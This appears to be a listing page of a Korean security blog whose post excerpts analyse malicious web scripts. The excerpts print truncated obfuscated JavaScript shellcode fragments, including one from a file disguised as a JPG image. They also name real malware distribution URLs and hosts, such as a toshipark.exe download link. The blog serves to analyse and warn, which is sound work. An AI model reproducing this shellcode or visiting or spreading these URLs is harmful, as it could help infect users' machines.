security 썸네일형 리스트형 오랜만에 보는 악성 스크립트 ! 제가 본 한 중국 사이트의 악성 스크립트 입니다 ! IE 버전을 확인한 이후에 위와 같은 스크립트에 연결 시켜 감염을 합니다 ! party.css 볼까요 var hua, hua1, hua2, hua3, hua4; hua='\x25'; var kao='\x25'; var shit='\x25'; var jj=hua+'u'+'4B5B'; var cao='\x25'; hua1='u'; kao+='u'; shit+='u'; var kk=hua+'u'+'CD36'; cao+='u'; hua2='58'; kao+='B'; shit+='B'; var ll=hua+'u'+'BD8F'; cao+='B'; hua3=hua+hua1+'5'; kao+='D'; shit+='D'; var mm=hua+'u'+'E9D0'; cao.. 더보기 V3lite.jpg 로 위장한 악성코드 !!!!!! 오랜만에 풀려하니 안풀리네요.........ㅋ var nb194608="";nb194608+="%u585";nb194608+="8%u5858";nb194608+="%u10EB%";nb194608+="u4B5B%u";nb194608+="C933%uB";nb194608+="966%u03";nb194608+="B8%u348";nb194608+="0%uBD0B";nb194608+="%uFAE2%";nb194608+="u05EB%u";nb194608+="EBE8%uF";nb194608+="FFF%u54";nb194608+="FF%uBEA";nb194608+="3%uBDBD";nb194608+="%uD9E2%";nb194608+="u8D1C%u";nb194608+="BDBD%u3";nb194608+="6BD%uB1.. 더보기 Eval 로 된 스크립트 간단하게 풀기 !! 한 공유 사이트를 보던중 있길래 그냥 적어 봤습니다.... eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function (중략) (e)}}}}}};',62,95,'|||114|||101|||105|61|32|104|var||109|111|116|97|102 |48|60|108|if|navigator|100|UAver|function|62|110|103|99|115|49|indexOf |else||||appVersion|docu.. 더보기 2011년 3월 마이크로소프트 보안 공지 발표 2011년 3월 마이크로소프트 보안 공지 발표 2011년 3월 9일 (수)에 발표된 마이크로소프트 보안 공지 발표 내용을 요약하여 제공합니다. 보안 공지는 월 단위로 발표되어 보안 취약점을 해결합니다. ================================================ 신규 보안 공지 ================================================ 마이크로소프트는 새로 발견된 취약점에 대하여 다음과 같이 3개의 신규 보안 공지를 발표합니다. MS11-015 (긴급) Windows Media의 취약점으로 인한 원격 코드 실행 문제점(2510030) MS11-016 (중요) Microsoft Groove의 취약점으로 인한 원격 코드 실행 문제점(2494047) MS.. 더보기 오늘 본 Ad.asp 스크립트 중 발견한 제작자의 의도적 실수 ?? 스크립트는 다음과 같이 이루어져 있다.. var NgGGQSmAX="%x9090%x90";var CFGqNAMIX="90%x5858%x5858%x10EB%x4B5B%xC9" 이와같이 조합하는 형식으로 되어있다... 그리고 스크립트 밑부분에 가면 다음과 같이 조합해야 나온다고 써져 있다. var uavzoZkUK = NgGGQSmAX+CFGqNAMIX+VYsEvodWn+WsCqipvVq+ahIzciCgy+ZbwmiAEOg+ zqBGCuEDE+FwwSXiMop+XsvvwDgBP+BndYBlCki+TvWHkIIat+nPgYVTCOy+YYBaynGHm+ gCvdgGHkD+KwkIbOwZa+PNuvvHnXo+lVOUbMZEA+XsHMwMpAi+GiLFNlgSh+fIXQLfhCv+ WOWTldKTG+EgdiUIiH.. 더보기 DDos 국내 보안 전용 백신으로 치료 하세요 !! 디도스 공격을 유발하는 악성코드는 ntcm63.dll, SBUpdate.exe, ntds50.dll, watcsvc.dll, soetsvc.dll, mopxsvc.dll, SBUpdate.exe 등이다. 이들 악성코드가 설치된 PC는 이른바 좀비 PC로 변해 일제히 특정 웹사이트를 공격한다. 악성코드가 유포된 경로는 국내 P2P사이트인 셰어박스와 슈퍼다운인 것으로 밝혀졌다. Hauri 하우리 전용 백신 안녕하세요. (주)하우리 보안대응센터 입니다. 2009년 7.7 대란에 이어 지난 3.3 일을 기점으로 국내 포털 웹사이트를 비롯한 40 여개의 웹사이트가 DDoS 공격으로 인해 피해가 증가되고 있어 주의를 요합니다. 해당 악성코드는 이미 전일 버전 바이로봇 2011-03-03.04 이후에 모두 업데이트 .. 더보기 악성코드 유포되는 샘플을 보던중 !! imm32a.dll 한 악성코드 샘플을 보던중 특별한걸 봐서 이렇게 써본다.. 악성코드는 다음과 같은 링크와 포트를 통해서 유포가 된다 !! http://haxx.dd4747.com:9888/ss.js http://haxx.dd4747.com:9888/count.html http://haxx.dd4747.com:9888/music.asp http://haxx.dd4747.com:9888/toshipark.exe Count.html 은 유포 통계를 보기 위해 만들어 진것이고... Music,asp 는 toshipark.exe 받는 역활을 한다 .... 그중 toshipark.exe 에 해당하는 파일을 봤다..... 기존의 imm32.dll 을 V3 제품군을 쓸 경우 imm32A.dll 로 패치하는것이 보였다. 또한 해당 악성.. 더보기 폴리뉴스 악성코드 유포 스크립트 간단하게 살펴보기.. !! * 본사이트는 악성코드가 있는 사이트를 알려 드립니다.!! 유포지 : http://www.polinews.co.kr [연결 되는 곳] http://204.188.243.136:7x/page/page.js http://204.188.243.136:7x/page/vospt.html http://204.188.243.136:7x/page/vegoa.htm http://204.188.243.136:7x/page/vtfep.htm[차례] page.js 보기 page.js 해석된 코드 vegoa.htm , vtfep.htm 메인코드 보기 ! Page.js 보기 !! var figwZPKw1="\x65\x6c\x67\x68\x35\x39\x33\x6b\x37\x73\x6b\x65\x72\x67\x35\x67\x73\.. 더보기 Jpg 파일로 위장한 악성 Script !! js.jpg로 위장한 악성코드 스크립트가 있어서 올려봅니다. 언뜻 보기에는 일반 사진 같습니다. 하지만 속에는 그 무언가 다른 존재가 존재하고 있지요..... var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35"; var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66.. 더보기 현재 유포되고 있는 네이트온 악성코드 연결 링크 !! 첫 유포 사이트 : http://www.kxmc.co.kr/nxxo/view.php?id=news&no=132 스크립트를 통해 연결 된 사이트 : http://www.imchxxch.net/bbs/data/sub1_8/index.html [index.html] 내에 들어있는 링크 !! http://www.imchxxch.net/bbs/data/style.css ~> 불법사이트 연결 , 프록시 사용 필요 !! http://www.imchxxch.net/bbs/data/sub1_8/in.js ~> ff10.htm 연결 !! http://www.imchxxch.net/bbs/data/main.html ~> 메인 악성코드 최종 링크 관문 !! http://www.imchxxch.net/bbs/data/sub1_.. 더보기 이전 1 ··· 8 9 10 11 12 13 14 ··· 20 다음
